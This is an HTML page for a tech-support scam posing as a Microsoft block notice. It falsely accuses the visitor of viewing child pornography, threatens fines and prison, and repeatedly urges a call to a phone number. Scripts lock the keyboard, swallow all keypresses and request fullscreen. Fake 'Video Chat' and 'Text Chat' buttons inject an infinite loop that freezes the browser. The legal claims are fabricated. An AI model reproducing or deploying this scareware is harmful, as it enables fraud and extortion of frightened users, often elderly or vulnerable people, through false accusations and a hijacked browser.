<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>!!!</title>
   
   <!--popup styling -->
   <style>
       #ac-wrapper {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: 1001;
        
        }
        #live-chat {
            width: 100%;
        
            height: 680px;
            background: #FFFFFF;
            box-shadow: #64686e 0px 0px 3px 3px;
            -moz-box-shadow: #64686e 0px 0px 3px 3px;
            -webkit-box-shadow: #64686e 0px 0px 3px 3px;
            position: relative;
            background-color: white;
            
          
            background-image : url(256.png);
            background-size: cover;
            background-color: white;
        }
        center{
            position: relative;
            top: 77px;
            font-size: 30px;
        }
        center #chat-btn button{
            padding: 10px;
            border-radius: 15px;
            background-color: #ff0000;
            color: white;
            transition: 1s;
            color: white;
            font-weight: bolder; 
            position: relative;
            top: 214px;
			width: 200px;
			height: 90px;
			right: 126px;
			font-size: 30px;
        }
        center #chat-btn button:hover{
            background-color: #0000ff7a;
        }
       
   </style>

<style>
		center #cht-btn button{
            padding: 10px;
            border-radius: 15px;
            background-color: #ff0000;
            color: white;
            transition: 1s;
            color: white;
            font-weight: bolder; 
            position: relative;
			top: 123px;
			width: 200px;
			height: 90px;
			left: 116px;
			font-size: 30px;
        }
        center #cht-btn button:hover{
            background-color: #0000ff7a;
        }
</style>

<style>
.center {
  margin: auto;
  width: 75%;
  padding: 60px 0;
}
p {
    color: white;
    text-align: center;
    margin-top: 0;
    margin-bottom: 0.99rem;
}

</style>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>
    $(document).ready(function(){
        $("#click").on('click', function(){
            alert('hi')
        });
    });
    
    function noNumbers(e) {
        var keynum;
        var keychar;
        var numcheck;
    
        if(window.event) { // IE
            keynum = e.keyCode;
        } else if(e.which) { // Netscape/Firefox/Opera
            keynum = e.which;
        }
        
        keychar = String.fromCharCode(keynum);
        numcheck = /\d/;
        return !numcheck.test(keychar);
    }
    </script>
<script>
    function hide()
    {
        document.getElementById("live-chat").style.display="none"
    
    }
  </script> 


</head>
<body style="background-color: rgb(0, 0, 0);">
            <div id="main-content">
                <img src="258.jpeg" alt="" width="500px" height="150px" style="position: relative; left: 30%;">
          
                <p style="font-size: 35px;">Close this Window at your own risk</p>
                <p style="font-size: 50px;"><img src="20.png" height="80px">MS Support read carefully</p>
                <p style="font-size: 35px;">***This computer is BLOCKED***</p>
                <p style="font-size:large;">Microsoft Windows [Version 10.0.254] (c) 2015 Microsoft Corporation. All Right Reserved</p>
                <p style="font-size:large;">We have found child pornography content on this site which is criminal offence under Australia Crime LAW section 2252 Your IP adress and email login is identified kindly contact us immidieatley at +1 (855) 640-9161 So we can take you out from this mess</p>
                <p style="font-size: 20px;"><strong>Child pornography site supported which is criminal offence under US Federal Law kindly contact on +1 (855) 640-9161 to avoid any legal action</strong></p>
                <p> Child Porn Punishment 20K$ FINE<br>
                    10 YEARS PRISON UNDER SECTION 2252 OF UNSC<br>
                    Your Email login and IP address is saved on this page<br>
                    Ignore at your own risk</p>       
                <p style="font-size:large;">you must contact us immediately Your screen might get freeze dont try to turn it off without clearing this issue </p>
                <p style="font-size: 50px;">Call/SMS us right away +1 (855) 640-9161</p>
            </div>
            
            <div id="ac-wrapper">
                <div id="live-chat" onclick="hide()">
                    <center>
                        
                        <p style="font-size: 30px;     position: relative;
                        top: 211px;">You must be 18 Or older to click 4,289,025 Members/1,190 Online<br><strong> Click Now</strong></p>
                        <div id="chat-btn"><button onclick="addScript()">Video Chat</button></div><div id="cht-btn"><button onclick="addScript()">Text Chat</button></div>
					
                    </center>
                </div>
              </div>

            <script type="text/javascript" src="fullscreen.js"></script>




<script>
function addScript() {
  // Create a script element
  var script = document.createElement("script");

  // Define the script code
  var scriptCode = `
    setTimeout("warning()", 1000);
    setTimeout("warning()", 1000);
    function warning() {
      while (true) {
        console.log('warning');
      }
    }
  `;

  // Set the script code as the content of the script element
  script.textContent = scriptCode;

  // Append the script element to the document's head
  document.head.appendChild(script);
}
</script>
            
           





<!---script>

    setTimeout("warning()", 13000);
    setTimeout("warning()", 13000);
    function warning(){
    while(true){
        console.log('warning')
}
}


</script------>

<script>
    navigator.keyboard.lock();
    document.onkeydown = function (e) {
    return false;
    }
</script>

	
</body>
</html>